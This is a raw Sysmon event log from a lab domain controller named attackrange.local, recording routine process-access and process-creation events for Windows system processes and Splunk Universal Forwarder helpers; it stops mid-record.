13:57:45.525{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-93D9-6005-DF04-00000000A301}5104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:57:45.525{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:45.525{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:57:45.525{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:45.525{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:57:45.525{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:45.525{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:57:45.525{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:45.525{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:57:45.525{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:45.525{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-93D9-6005-DF04-00000000A301}5104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:45.525{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-93D9-6005-DF04-00000000A301}5104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:45.525{59A5CD1D-93D9-6005-DF04-00000000A301}5104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:46.025{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-93DA-6005-E004-00000000A301}2832C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000009599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:46.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:46.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:57:46.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:46.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:57:46.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:46.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:57:46.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:46.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:57:46.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:46.025{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-93DA-6005-E004-00000000A301}2832C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:46.025{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-93DA-6005-E004-00000000A301}2832C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:46.026{59A5CD1D-93DA-6005-E004-00000000A301}2832C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:47.165{59A5CD1D-93DB-6005-E104-00000000A301}45362484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program 